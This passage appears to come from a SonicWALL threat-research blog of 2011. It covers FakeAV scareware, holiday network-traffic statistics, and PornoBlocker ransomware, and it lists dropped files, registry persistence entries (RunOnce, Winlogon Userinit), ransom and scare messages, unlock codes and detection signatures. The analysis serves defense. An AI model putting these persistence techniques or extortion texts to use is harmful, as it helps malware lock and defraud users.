If the user clicks on the malicious link in the search results then it performs the following on the victim’s machine:

  • The initial link redirects users to a FakeAV landing page.

    screenshot

  • If the user downloads and runs the FakeAV executable then it performs the following on the victim’s machine:
    • Drops the following files:
      • %USERPROFILE%\Application Data\fPgHcEm13400\fPgHcEm13400.exe (Copy of Itself) [Detected as FakeAlert.MHF (Trojan)]
      • %USERPROFILE%\Application Data\fPgHcEm13400\fPgHcEm13400

    • Creates the following registry entry to ensure that the dropped malware runs on every system reboot:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce: “fPgHcEm13400:%USERPROFILE%\Application Data\fPgHcEm13400\fPgHcEm13400.exe”
    • It changes the wallpaper with the following text:
      • WARNING!
        YOU’RE IN DANGER!
        YOUR COMPUTER IS INFECTED WITH SPYWARE!

        ALL YOU DO WITH COMPUTER IS STORED FOREVER IN YOUR HARD DISK.
        WHEN YOU VISIT SITES,SEND EMAIL… ALL YOUR ACTIONS ARE
        LOGGED. AND IT IS IMPOSSIBLE TO REMOVE THEM WITH STANDARD TOOLS. YOUR DATA IS STILL AVAILABLE FOR FORENSICS. AND IN SOME CASES

        FOR YOUR BOSS, YOUR FRIENDS, YOUR WIFE, YOUR CHILDREN.
        Every site you or somebody or even something , like spyware, opened in your browsers,
        with all the images, and all the downloaded and maybe later removed movies or mp3 songs –
        ARE STILL THERE and could break your life !

        SECURE YOURSEFL RIGHT NOW! REMOVE ALL SPYWARE FROM YOUR PC!

    • It launches fake scans and when the user attempts to clean the machine a screen is displayed asking for credit card and personal information:

        screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: FakeAlert.MHF (Trojan)

The holiday season has passed (Feb 03, 2011)


One month after Christmas and New Year’s Day, has everybody come back to work? Of course: there is no more shopping, surfing online and gossiping. Let’s look at the proof.

First, let’s check the most popular regular online applications people have been using for the last couple of months. People like surfing everywhere, such as shopping websites, so web analytics applications are no doubt the most popular ones, for example Google Analytics; people like social networking, such as Facebook; network security is an issue, so people download more software security updates, such as Microsoft Windows Updates. Let’s see how people were using them during the holidays compared to before and after. The spike for these applications started on Nov 15th 2010, grew gradually, topped out on Dec 14th 2010, and dropped sharply on Dec 17th 2010. The hit count is almost 14 times that of a regular work day.

Application Hits

Second, let’s see the IM, P2P and multimedia software people like. People still use eMule and BitTorrent to download software and movies; people like multimedia streams such as Shockwave Flash (SWF), PPStream and YouTube; people use Skype and Windows Live Messenger to chat online. The following graph shows IM, P2P and multimedia online software during the last few months. The spike for IM, P2P and multimedia started on Nov 16th 2010, grew gradually, topped out on Dec 13th 2010, and dropped sharply on Dec 16th 2010. The hit count is almost 8 times that of a regular work day.

IM P2P Multimedia Hits

Third, hackers are happy as they have time to have fun, post more malicious web pages, get more targets, or make some money… OK, let’s take a look. The spike started on Nov 11th 2010, grew gradually, topped out on Dec 13th 2010, and dropped sharply on Dec 16th 2010. The hit count is almost 80 times that of a regular work day.

IPS Hits

Fourth, Trojans and viruses were not spread so widely during the holiday season. Let’s take a look. The spike started on Nov 18th 2010, grew slowly, topped out on Dec 15th 2010, and dropped sharply on Dec 16th 2010. The hit count is almost 6 times that of a regular work day.

GAV Hits

Guys, back to work. Don’t you see the traffic is back to normal?

PornoBlocker – Trojan Ransomware (Jan 27, 2011)

SonicWALL UTM Research team received reports of a new variant of Trojan Ransomware seen in the wild. The Trojan locks down the system and asks the user to send money via premium SMS in Russia to receive the unlock code.

Process of Infection:

An unsuspecting user may download the Trojan from malicious websites. The screenshot below shows the Trojan using a movie icon.

screenshot

Once installed, the Trojan will lock down the system by displaying the image below:

screenshot

Below is the rough translation of the image:

    Attention!!!

    Your Operating System is blocked for violation of Internet usage.

    We discovered the following violations: visiting pornographic sites with elements of child porn, rape and bestiality. Storage of video files containing porn with presence of under-aged, rape, bestiality etc.

    Usage of pirated software.

    This block is intended to prevent the possibility of spreading this material over the internet.
    To remove this block you must:

    Replenish Beeline account number:
    8-903-202-99-12
    For the amount of 400 rubles

    After the payment on your receipt you will find a code, which you should enter in the field below

    When your system is unblocked you must remove all the illegal materials from your device.

    ENTER THE CODE:

The Trojan alleges that the user engages in illegal activities and possesses materials in violation of Internet usage rules, which supposedly caused the system lockdown. The message is of course a scam and just the Trojan’s way to extort money from the user.

Interestingly, the unlock code is embedded in the malware and can be used to regain control of the system. Some of the unlock codes seen on different variants of this malware are the following:

  • 8875510
  • 8095147
  • 3796054

After unlocking the system, the malware will delete itself.

Installation:

Drops a copy of itself:

  • %Windows%\usrinit.exe – [ detected as GAV: PornoBlocker.DMQ (Trojan) ]

Registry Changes:

Modifies the registry entry below to ensure that the dropped copy of the malware starts on every system reboot:

  • Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    Value: Userinit
    Old Data: “C:\WINDOWS\system32\userinit.exe,”
    New Data: “C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\usrinit.exe”

Other System Modification:

Terminates the following process:

  • Task Manager

SonicWALL Gateway AntiVirus provides protection against this Trojan via the following signatures:

GAV: PornoBlocker.DMQ (Trojan)
GAV: PornoBlocker.DMS (Trojan)
GAV: LockScreen.P (Trojan)